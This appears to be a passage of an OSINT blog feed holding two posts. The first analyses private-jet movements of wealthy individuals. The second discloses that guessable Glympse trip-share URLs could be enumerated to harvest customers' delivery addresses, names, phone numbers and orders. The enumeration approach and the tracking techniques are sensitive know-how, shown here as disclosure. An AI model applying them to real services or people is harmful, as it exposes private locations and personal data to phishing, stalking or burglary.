    style=&quot;padding-bottom: 89.1891891891892%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAIAAADUsmlHAAAACXBIWXMAAAsSAAALEgHS3X78AAAEB0lEQVQ4yy2T7U9bVRzH71/iWzGYTXpv4dKeh3t7oS3DsQiiLlFf+gLHQ9v73HvbMg3BJSbGGE0wCw8Ddb5x2RjgMEMhuFFK2SBzPJRR2lIeRp+L0ZK2XuJenOTk98v3nM/v+z2HKJVKuVx2O5J49Ph5cHVraXUzGNwIrkYePgxNP/hzemZxYWl9eTWyFN4KhjeXg5uPljcOT/LVSqRSzhO5XD6290JThk2vd7HNMmQEWNcLGJkh3QjxuMGDm3mIZIBFyIpsnZsy9dy5u/rPv1oqtUBks7m96I4euEXWXmMcCnTI0OwCTSpT74FYQFYBt0qoSQNNCrTLbINI0e67k0+2TwePC2EiXyjsx6O+GxMmq4t9X4PtCmB5S4cP2yR4RYJOmflQBu1+S7sGO72MTTU5xXu/PfkjM7STWSOKxdPDg4Suj5C1XdghAcyji92AlTDlBsCNaDe08xDLwBiHE2wmD0n2Tk6Gbh/dXj9+RuTzhehuRAuMkhe6UYtqtSuI7DNmRvU8MLAtArgkQc5r5WTQLNvMgol2T06tfBO9t5aOErn8uWF6/wRV14cv67BFww08sGuMWYBNCsYyalOR3Q/tGmzx2hpkslGYmgkPbswuRJ8TmUz26HBf941QtV2sXYQcj009wCYydX3I0odpF7Z7ECNBRkQsb6M8pLl3amr5s/DvKwcJIhaP7yf2NP8oebGbaVWAQ0aG280qpo2EeNzogZclxHmBge1Q2HoD2zU1ExpYnF+MRF5F5ft8lKS62Q4FtknQ6gJvKxjwyMkbtzFXeHjJC1oV1CYxQDIx7unZ5S8ezId240ShWNyPRfXBCdLiYq76YKduEFo7/JiVYZuCnCr+QAVtAWu7D3boLKuZ7PLUXPjLX+ZXtmLnbicTe7p/nHqzh3HokFMx6YasxlACQhKmRehUENYQlKFN5SiJovj7Mytf/zi/9DRy7nZ0Z9t744c67EEf+SxXdcAJje8FUJNifUcBrSr42GvpvN7Yrlnf9TKc9laLcn8+/N3Q3PpfCaJQKMZjLwLaGF3b0+TUWE7lSDfLejmKt0GRo0XWodgYzcZ6bVix1/E05Zn+deX7r2ZDj7eI4unfBrYoD9e89okZC6TFQ9V8StK8uabbRPVRF3pJxkM1SCaaJxs99Bu9NTXX7syEvlV/XluKEKXSWS6TvvXTXG/fkDwwLlwfE4WbQv+4LAwL+rCkDEsDo6J/QuwfFwNjsjDSI9wMPt2ZGZnbebZHVKvVcrmcTCaOjvYTib14LJo8iB8e/L/fPT4+SCZiRnE/ETs6TMbiu0bx7KxkqCqVyitxNptNpdIpY6UzmXTGCD91korHjROPM5nMy5cnRsd4i+lU2vj/5UrZUFYr1f8ADS5DfccX4TYAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Colo Matrix&quot;
        title=&quot;Colo Matrix&quot;
        src=&quot;/static/7a884a9c4587747dec153c760e6e8010/01e7c/matrix.png&quot;
        srcset=&quot;/static/7a884a9c4587747dec153c760e6e8010/12f09/matrix.png 148w,
/static/7a884a9c4587747dec153c760e6e8010/e4a3f/matrix.png 295w,
/static/7a884a9c4587747dec153c760e6e8010/01e7c/matrix.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The substantial co-location in the matrix stems primarily from frequent use of major airports in London, Dubai and Washington, as the abundance of green and yellow on the chart shows. Should you try to recreate something similar for your own investigation, this kind of analysis can be valuable for identifying patterns in the movements of HNWIs, as well as their potential business and personal connections.&lt;/p&gt;
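&lt;p&gt;Co-location can be defined in several ways. Assuming it means two aircraft recorded at the same airport on the same day, pairwise counts like those plotted in the matrix could be built roughly as follows; the &lt;code&gt;(aircraft_id, airport_code, date)&lt;/code&gt; record layout is hypothetical.&lt;/p&gt;

```python
from collections import Counter, defaultdict
from itertools import combinations


def colocation_counts(visits) -> Counter:
    """Count how often each pair of aircraft shared an airport on the same day.

    visits: iterable of (aircraft_id, airport_code, date) tuples, e.g. derived
    from landings in ADS-B history. Duplicate visits are collapsed.
    """
    present = defaultdict(set)  # (airport, date) -> aircraft seen there
    for aircraft, airport, day in visits:
        present[(airport, day)].add(aircraft)
    pairs = Counter()
    for aircraft_set in present.values():
        # sorted() gives each unordered pair a stable (a, b) key
        for a, b in combinations(sorted(aircraft_set), 2):
            pairs[(a, b)] += 1
    return pairs
```

&lt;p&gt;Arranging these counts into a square matrix, with one row and one column per aircraft, gives a structure that can be plotted as a heatmap.&lt;/p&gt;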
&lt;p&gt;To identify airports exhibiting anomalous spikes in activity, I analysed variations in yearly traffic patterns. This approach highlighted Hong Kong International Airport, which displayed a notable surge in activity around March 2023, indicating a period of unusual busyness.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/d4a2ef8667bcd05209e62b64de131ef7/01e7c/hkia.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.45945945945946%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsSAAALEgHS3X78AAABgUlEQVQoz3VT2XLDIAz0//9fH9s+tOmROjFgjDgMqlYObppJmNFICCStFjHUWnldV5VbO6XE1loVY4yKc079j+IGbEop6uwH85K4iG6tcl+ttd3uSfr9a/smYVPtfORAmVMuDwNR4J49YNOdFyxs5sjH88I/07KjQwD0Pbsv2AMRKUK0B0RA5kPi0QT+ODqOqXAuK+c7aJtIlliKhSdHW0KQ3Kv4kPn75HUPHl8Pk15MedVCvYM/bpuCQDdPzz/qGbz3WrEIirME25kUFQTJz5bYSXKKmY2cB9GBkhZEwkW6QcJR6KlVONQ6gggJgAYaLWAhCXwnS1rw7ctqFyh6Ekq2rhJ/jp5T2UANyl3Ke2sxZdUgHBdICizSLjgczaLInCctBp5RZLlMhCYE7I7ket76K26v17SIlXECQiSocnaQR3t5n/6/srYbIxNFdcDuc9ltcBxClL0gAeKwUQD+Zh/kvGoH+EHKIQLXsvEWQtjnDHafU3y7/kuIwm4jCRY05BcRxay3o1HhyAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;HKIA&quot;
        title=&quot;HKIA&quot;
        src=&quot;/static/d4a2ef8667bcd05209e62b64de131ef7/01e7c/hkia.png&quot;
        srcset=&quot;/static/d4a2ef8667bcd05209e62b64de131ef7/12f09/hkia.png 148w,
/static/d4a2ef8667bcd05209e62b64de131ef7/e4a3f/hkia.png 295w,
/static/d4a2ef8667bcd05209e62b64de131ef7/01e7c/hkia.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
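&lt;p&gt;One simple way to flag such spikes is to compare each month’s visit count at an airport with that airport’s own mean and standard deviation across the year, and report months whose z-score exceeds a threshold. The sketch below is a hypothetical illustration of that technique rather than the exact analysis used here; the input layout and the threshold of 2.0 are assumptions.&lt;/p&gt;

```python
from collections import Counter, defaultdict
from statistics import mean, pstdev


def monthly_spikes(visits, year: int = 2023, threshold: float = 2.0):
    """Flag (airport, month) pairs whose visit count is unusually high.

    visits: iterable of (airport_code, "YYYY-MM-DD") tuples.
    Returns (airport, month, count, z_score) rows, highest z-score first.
    """
    per_airport = defaultdict(Counter)  # airport -> Counter of month number -> visits
    for airport, day in visits:
        if day.startswith(f"{year}-"):
            per_airport[airport][int(day[5:7])] += 1
    flagged = []
    for airport, months in per_airport.items():
        # Include months with no visits so quiet months count towards the baseline.
        counts = [months[m] for m in range(1, 13)]
        mu, sigma = mean(counts), pstdev(counts)
        if sigma == 0:
            continue  # perfectly flat traffic: nothing stands out
        for m, count in enumerate(counts, start=1):
            z = (count - mu) / sigma
            if z >= threshold:
                flagged.append((airport, m, count, round(z, 2)))
    return sorted(flagged, key=lambda row: row[3], reverse=True)
```

&lt;p&gt;With only 12 monthly values, a single month’s z-score (using the population standard deviation) can never exceed √11, roughly 3.32, so very high thresholds will never trigger.&lt;/p&gt;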
&lt;p&gt;During the unusual activity period at Hong Kong, the aircraft were exclusively leased or chartered private jets, rather than private planes owned by HNWIs. To maintain privacy and avoid unintentional doxxing, details about the real or beneficial owners and lessees of the aircraft have not been disclosed. However, those familiar with OSINT will recognise the potential value of exploring corporate records and social media intelligence to ascertain the identities of individuals travelling on aircraft within a given timeframe. While a detailed discussion of these methods is beyond the scope of this article, numerous online resources are available for those interested in learning more.&lt;/p&gt;
&lt;p&gt;The spike in activity at Hong Kong airport does coincide with Art Basel Hong Kong, a prestigious event in the world of contemporary art. Art Basel, a series of international art fairs held annually in Hong Kong, Basel, and Miami, showcases a wide array of modern and contemporary artworks from established and emerging artists, presented by leading galleries. This event has become a magnet for billionaires and art connoisseurs due to its reputation as a hub for significant art transactions and networking opportunities. The fair is not only a platform for buying and selling high-value artworks but also serves as a cultural and social gathering, attracting a global audience that includes collectors, museum directors, curators, and art enthusiasts. As a result, it’s a key event on the social calendars of the wealthy, often leading to an increase in private jet traffic to the host cities during these fairs. While correlation is not causation, there is a realistic possibility that the spike in HNWI air traffic is related.&lt;/p&gt;
&lt;h2&gt;So What?&lt;/h2&gt;
&lt;p&gt;The act of removing or blocking flight data from public tracking sites is a double-edged sword. On one hand, it serves the legitimate interest of providing privacy for HNWIs and corporations. However, this very act of concealment can sometimes draw more attention, paradoxically highlighting the individuals or entities as subjects of interest.&lt;/p&gt;
&lt;p&gt;The tracking and public dissemination of flight data also bring to the forefront concerns about the security and privacy of individuals. There is a fine line between public interest and invasion of privacy, and the potential for misuse of this data for malicious purposes cannot be overlooked. Legal approaches to the removal of data are effective and worthwhile, but when they can be circumvented by aggregation elsewhere, HNWIs should consider engaging OSINT experts to supplement legal strategies.&lt;/p&gt;
&lt;p&gt;Feel free to reach out if you have any questions; I can be found on &lt;a href=&quot;https://twitter.com/df_works&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.reddit.com/user/df_works&quot;&gt;Reddit&lt;/a&gt; and &lt;a href=&quot;https://www.linkedin.com/in/daniel-faram-71b610219/&quot;&gt;LinkedIn&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Please also check out my other OSINT project &lt;a href=&quot;https://reversepp.com&quot;&gt;ReversePP&lt;/a&gt;, a planning application aggregator.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[I know what pizza you ordered!]]></title><description><![CDATA[Glympse is a journey sharing and location tracking application that helps either individual users or enterprise partners with deliveries and…]]></description><link>https://dfworks.com/blog/pizza_order/</link><guid isPermaLink="false">https://dfworks.com/blog/pizza_order/</guid><pubDate>Fri, 10 Mar 2023 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Glympse is a journey sharing and location tracking application that helps either individual users or enterprise partners with deliveries and other trips. The Glympse website suggests that its user base includes more than 200k mobile worker devices and more than 30M consumer devices, and the Glympse Android app has had around 5 million downloads.&lt;/p&gt;
&lt;p&gt;On any given day, primarily in the United States, Glympse shares the exact routes of many individuals as well as delivery information, package details, driver information and whatever other information or metadata their enterprise partners wish to attach to their trips. Understandably, this information makes life easier for drivers as well as package recipients.&lt;/p&gt;
&lt;p&gt;As you can imagine, much of this information is intended to be private and was given to Glympse (or an enterprise partner) on the understanding that it would be adequately protected and not publicly available. If these protections are not in place then there is potential that this information, either aggregated or in isolation, could be hugely useful to a social engineer or competitor. I think a phishing email containing real delivery and package information would be very convincing! I’m less confident that Pizza Hut would like to know Papa John’s most popular pizza, but you never know!&lt;/p&gt;
&lt;h3&gt;The Application&lt;/h3&gt;
&lt;p&gt;For the individual user, the UI is fairly simple and what you might expect of an application of this kind.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/c7bb4aaf14932447dbedfa1c7175c70f/e3f06/monica.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 133.1081081081081%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAGgAAAQUBAAAAAAAAAAAAAAAAAAECAwQFBv/EABYBAQEBAAAAAAAAAAAAAAAAAAABAv/aAAwDAQACEAMQAAAB1EsKnOjw25InphATX//EABoQAQACAwEAAAAAAAAAAAAAAAEAMQIDEBH/2gAIAQEAAQUCdOuGnCeQ42PGyyN//8QAFxEAAwEAAAAAAAAAAAAAAAAAAAIREP/aAAgBAwEBPwGEFz//xAAZEQACAwEAAAAAAAAAAAAAAAAAAQIQERL/2gAIAQIBAT8B6ZrJV//EABkQAQACAwAAAAAAAAAAAAAAAAEQMgAgcf/aAAgBAQAGPwKhlDRlh7H/xAAcEAACAgMBAQAAAAAAAAAAAAAAAREhEEGhMXH/2gAIAQEAAT8hjUEOwd3DasRrcknUasd2N27D1+n/2gAMAwEAAgADAAAAEHc3Qv/EABgRAQADAQAAAAAAAAAAAAAAABEAARAh/9oACAEDAQE/ECsEvZ3P/8QAGREAAgMBAAAAAAAAAAAAAAAAAAEQESFh/9oACAECAQE/EMKs6CJPI//EAB8QAQACAQQDAQAAAAAAAAAAAAEAESFhcaGxMUFRgf/aAAgBAQABPxC3bezE5drGGGEGLA6ywFZWX60lC1aCcx3FEWTqHn9nIdwCLPszBdMNpzXc/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Monica&quot;
        title=&quot;Monica&quot;
        src=&quot;/static/c7bb4aaf14932447dbedfa1c7175c70f/1c72d/monica.jpg&quot;
        srcset=&quot;/static/c7bb4aaf14932447dbedfa1c7175c70f/a80bd/monica.jpg 148w,
/static/c7bb4aaf14932447dbedfa1c7175c70f/1c91a/monica.jpg 295w,
/static/c7bb4aaf14932447dbedfa1c7175c70f/1c72d/monica.jpg 590w,
/static/c7bb4aaf14932447dbedfa1c7175c70f/e3f06/monica.jpg 643w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This image was taken from Glympse’s website and as you can see there isn’t anything hugely compromising and only a first name is available. You have a start location, an end location, a route and some timing information. In this instance, “Monica” is walking to the Seattle Space Needle and it is going to take her about 11 minutes. All useful information she might share with a friend she is meeting (Monica is a dummy account just in case you were wondering).&lt;/p&gt;
&lt;p&gt;However, here is another example. I have hidden the last name, profile image and exact end location, but you can see how this is potentially more problematic (before you try, the link is no longer live!). Identifying an individual who has ended their trip at a home address (or residential location) is a breach of privacy, and this information starts to become useful to criminals: if not cyberattackers, then at the very least opportunistic burglars!&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/e878c385405f4429a9f757a9dae2396b/d67ca/paul.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 73.64864864864865%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAABcRAAAXEQHKJvM/AAADvElEQVQ4y12T62ubZRjG3/9KdPPTBBkyFB1qXdNNhxNBBts+yoQh/eDwgzBXlqRpk55pesi5adLT2rR1TZvYnLq2a05v3mPeNEmb6VDw59NuH8QPP+734Xm5uO77uh9pKZFlMZEntJhmaGoVz+Qyg5OrDHpXGfNvMh58ds5EIMlkcEfUrfP6f7zB1Pk/0u3vHdx54OH2Dy7e/bSXd672cvn6j1z5spf3bQ/54MZDLtt+4tL1+1yw3eVSzwMu9tzjou0eF3ru8nb3Hd7qEti+470b95F+Du9zazCLelQk8KzMQELhqFpG1zNo9SaaaWEaL8k011lseIkpWYKWnWjDQ/x4hPn6MFFtjKS1SqVZRhpbL/HLQo2/2x3+efUXL1912HqRYK8aIScn2ClucKBlODxOkjleY664Q/BoiN/UBQ5qh+wr+xQq+xSrGhVFR2q125yentLsdGi0TjluG0SqI4TKDgpWgKg5TkgZYKnkJ16bxl9cF/dudvUVTM3AMBRUpYpuVKlbCpLWaKFaTcxWm3rzlHpHZ7kySVgeZvu4n7jqIXg4wXxxjFl5nMlKFG/NjjM9z9zvCpG0IqpKOKUQ2xWCJVlFMRvIYlZWo0PpZB+f6mT+aIKMFWHX9LKgelkSLY4XY0RMF+69UT57kuOTvqwgw1XBR79m+GogjyTrJjXDolyzyBhpVuo+/EY/4ZqHpLJI7niULWuNuLyHTxliru5k9iBOT3+Oa8483f15bIIuR45vhwtIVa2BWT8VM0nj1/rPCWguorqHHW2Fzdooy0qAZWORkO5ksxEmeajS7czxheO16Bmf23N84xGCOTnPshwiaLjOhUK6mxnVzooxxYbiY6IcZMfwk7CmmFYdYq5xtp7rQiQrBPNvBHNCMM+toSxSSBvEpz8WYoPCnYtZ7Qkxc4R0M0xYH2RErNCa6eGwtSTO48TNYbFWVdFy4T8Oc3TZC9z0pJDC+jDT8gzTpQjByjwb9ahwEWHOcDN+9JQZcRc27GQbY/j1flK1BEnh8Lrr9fx63nDNUeDr4TTSdGmFWDFCXKS6UJ0gpkWZLEcEUaYrc2IEwrU6QKLhYKM2QbGmkMjLfPx4lw9FsmecJXzlURabaxdpQSQWlu34TScBke6s2odPtO47C8gQ37qdgBBd0r3U9E10q0VqX6YvdoB9qYh7tYJrpcSj+QNGEi+QgmU3T+shDqw9nusF0qU029VNUtoWKXWbHXWLjJqhLLah0ayI15DEtGTxuk5onzRFbfPnHx1aLYt2U+FfIpXH2qq1d7MAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Paul&quot;
        title=&quot;Paul&quot;
        src=&quot;/static/e878c385405f4429a9f757a9dae2396b/fcda8/paul.png&quot;
        srcset=&quot;/static/e878c385405f4429a9f757a9dae2396b/12f09/paul.png 148w,
/static/e878c385405f4429a9f757a9dae2396b/e4a3f/paul.png 295w,
/static/e878c385405f4429a9f757a9dae2396b/fcda8/paul.png 590w,
/static/e878c385405f4429a9f757a9dae2396b/d67ca/paul.png 714w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The eagle-eyed amongst you might see where this is going.&lt;/p&gt;
&lt;p&gt;The URL (&lt;a href=&quot;https://glympse.com/0HG4-HX6J&quot;&gt;https://glympse.com/0HG4-HX6J&lt;/a&gt;) has a fairly short unique identifier appended to the end. &lt;em&gt;0HG4-HX6J&lt;/em&gt; is 9 characters long and uses uppercase letters, digits and a special character (the hyphen).&lt;/p&gt;
&lt;p&gt;By way of comparison, most online file-sharing services that generate random URLs use upwards of 20 characters drawn from uppercase, lowercase, numeric and special characters (e.g. Aj5ye&amp;#x26;hsk8Pq@3Hh%#3Q), which makes them many orders of magnitude harder to brute force or guess.&lt;/p&gt;
&lt;p&gt;My first approach was a Python script that generated 9-character alphanumeric codes and checked whether each one was valid by sending an HTTP request to Glympse. It was initially sluggish. Even though the URL ID is comparatively short, there are still around 2 × 10&lt;sup&gt;16&lt;/sup&gt; combinations to get through, which means slow progress if you need to stay below the threshold of any potential rate limiters.&lt;/p&gt;
&lt;p&gt;However, after playing around with the app I identified a pattern! All the URL suffixes started with a zero, had a hyphen as the 5th character and contained no other special characters, which reduced the combination space significantly (to approximately 9 × 10&lt;sup&gt;10&lt;/sup&gt;).&lt;/p&gt;
&lt;p&gt;With a few tweaks to the Python script, it was possible to harvest thousands of valid URLs in just a few hours. These included many trips where the Glympse application had been white-labelled by Glympse’s enterprise partners!&lt;/p&gt;
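&lt;p&gt;The combination spaces above are easy to sanity-check. The sketch below computes them under explicit assumptions and makes no network requests. The naive case assumes a 64-symbol alphabet across all 9 positions (64&lt;sup&gt;9&lt;/sup&gt; = 2&lt;sup&gt;54&lt;/sup&gt; ≈ 1.8 × 10&lt;sup&gt;16&lt;/sup&gt;, in line with the rough figure above). The patterned case assumes the 7 remaining positions only ever held A–Z or 0–9, as in 0HG4-HX6J. That gives 36&lt;sup&gt;7&lt;/sup&gt; ≈ 7.8 × 10&lt;sup&gt;10&lt;/sup&gt;, the same order of magnitude as the estimate above. A 20-character token over printable ASCII is included for comparison.&lt;/p&gt;

```python
import math
import re

# Pattern observed in the IDs: a leading zero, three symbols, a hyphen, four symbols.
# Assumption: free positions only ever hold A-Z or 0-9, as in the example 0HG4-HX6J.
OBSERVED_ID = re.compile(r"0[A-Z0-9]{3}-[A-Z0-9]{4}")


def keyspace(alphabet_size: int, free_positions: int) -> int:
    """Number of distinct IDs when every free position can hold any symbol."""
    return alphabet_size ** free_positions


def entropy_bits(space: int) -> float:
    """Bits of guessing entropy for an ID drawn uniformly from `space` values."""
    return math.log2(space)


estimates = {
    # Naive: all 9 positions free over an assumed 64-symbol alphabet
    "naive 9-char ID": keyspace(64, 9),
    # Leading '0' and 5th-character hyphen fixed, leaving 7 positions of A-Z/0-9
    "patterned ID": keyspace(36, 7),
    # A 20-character token over the 94 printable ASCII symbols, for comparison
    "20-char token": keyspace(94, 20),
}

for label, space in estimates.items():
    print(f"{label:16} {space:.2e} IDs  ({entropy_bits(space):.1f} bits)")
```

&lt;p&gt;The entropy column shows the gap more clearly than the raw counts do. The patterned IDs carry roughly 36 bits, while a 20-character random token carries more than 130 bits.&lt;/p&gt;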
&lt;h3&gt;Papa John’s&lt;/h3&gt;
&lt;p&gt;Many of the URLs that resolved to a trip were Papa John’s pizza deliveries. The HTTP response included the items that had been ordered, an address and, in some responses, a name and telephone number (it is unclear whether these belonged to the driver or the recipient). Some trips also offered the option to leave a review, which could potentially be abused if it is available to people other than the customer (a Pizza Hut-sponsored data pollution attack??)&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/988a96bcdb90d448068f6481ded856f6/ecfa6/papajohns_review.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 54.05405405405405%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7CAAAOwgEVKEqAAAACH0lEQVQoz11S227TQBD1h/LKH/AG4WIn67V313e3QqgSgqeiICGkNrSE2xNSH1Gl3kJpHOcCoogqgUai5DC7cQzi4Wi865kzZ86O1X39BrvdV+i82EFnZ9fg4NMZBhffURLG0ylGsxl6wyH6xQBnRYnT/gDlaIzjXg/bpualic+3tmFxX8CXClIFUARXKXSjFPtcYj9McJTfx7E+P2njx/wnytMDHH7Yw/nXLygGJRr3HNy2mwYN24YVJSnCOIGOQRRDUXwaxngXxOh4AltugK4n8X5zE6PpAkcfJ5iVJ7iazzAcT8CFgq8icBKlYTFfQsOlH+abSFxqwLI1uHmKeOMBeL6Ox+02fl0Bw4tLnHw7xwLAZPLZELrCQ9Nn4EosCV1DKkys4VVWhBJ3HQcbDx8BvxfY6x+CvX2G2fwSRVHA4S04HkPT8xEksSYUqFUapdJYkGQ5kpSQZfSPg5EKEZPPcYQ8W6fiDAHleaRKhhEU+Z2ma/+OLGtiFSWI05QSQ3hyaUWLFDS5hxb3SZVPZ7GcSggiyuEmAneiJiyd6GqV2rsqgdVRVoUrW/76rb1zODcPoRXfimxc869XHpI63ZnVRcLc1Q/136OZSA1blOfRqml7YtqOG8FNWKvCVYFWJIKARs7MKim9SgSzHkFIKxIaVayaQJF/td9UYzVsBodx2ARNqo2O4sQQapjuFXma5+Yc0mvqu5DutNd1TpbiDz4cbTp9KeChAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Papa Johns 1&quot;
        title=&quot;Papa Johns 1&quot;
        src=&quot;/static/988a96bcdb90d448068f6481ded856f6/fcda8/papajohns_review.png&quot;
        srcset=&quot;/static/988a96bcdb90d448068f6481ded856f6/12f09/papajohns_review.png 148w,
/static/988a96bcdb90d448068f6481ded856f6/e4a3f/papajohns_review.png 295w,
/static/988a96bcdb90d448068f6481ded856f6/fcda8/papajohns_review.png 590w,
/static/988a96bcdb90d448068f6481ded856f6/efc66/papajohns_review.png 885w,
/static/988a96bcdb90d448068f6481ded856f6/c83ae/papajohns_review.png 1180w,
/static/988a96bcdb90d448068f6481ded856f6/ecfa6/papajohns_review.png 1819w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/220d6f27e360bf8048e7337f2c76489c/ca12d/pizza.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 15.54054054054054%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAABcRAAAXEQHKJvM/AAAAbklEQVQI132OSwqAMAxEe/876KKtV/EsKn6aKii0ydh2IYKfxWMewwSiRBgi8RPcHf9bEYE69hbOVXCLxrY18N5gXS2INMjpkrkjMhin+vKMLzuT7izm2SJGgmL2CKFL9KkYCiHePLw78/Dw/OUJqHfj3FyCgGUAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pizza&quot;
        title=&quot;Pizza&quot;
        src=&quot;/static/220d6f27e360bf8048e7337f2c76489c/fcda8/pizza.png&quot;
        srcset=&quot;/static/220d6f27e360bf8048e7337f2c76489c/12f09/pizza.png 148w,
/static/220d6f27e360bf8048e7337f2c76489c/e4a3f/pizza.png 295w,
/static/220d6f27e360bf8048e7337f2c76489c/fcda8/pizza.png 590w,
/static/220d6f27e360bf8048e7337f2c76489c/ca12d/pizza.png 647w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;Pottery Barn&lt;/h3&gt;
&lt;p&gt;Some of the URLs resolved to Pottery Barn deliveries. The data that could be captured from HTTP responses included addresses, recipients’ first and last names and the time of delivery. As discussed, specific information like this could be used in a convincing phishing attack. In the European Union this information would also be considered personal data under the GDPR.&lt;/p&gt;
&lt;p&gt;&lt;span
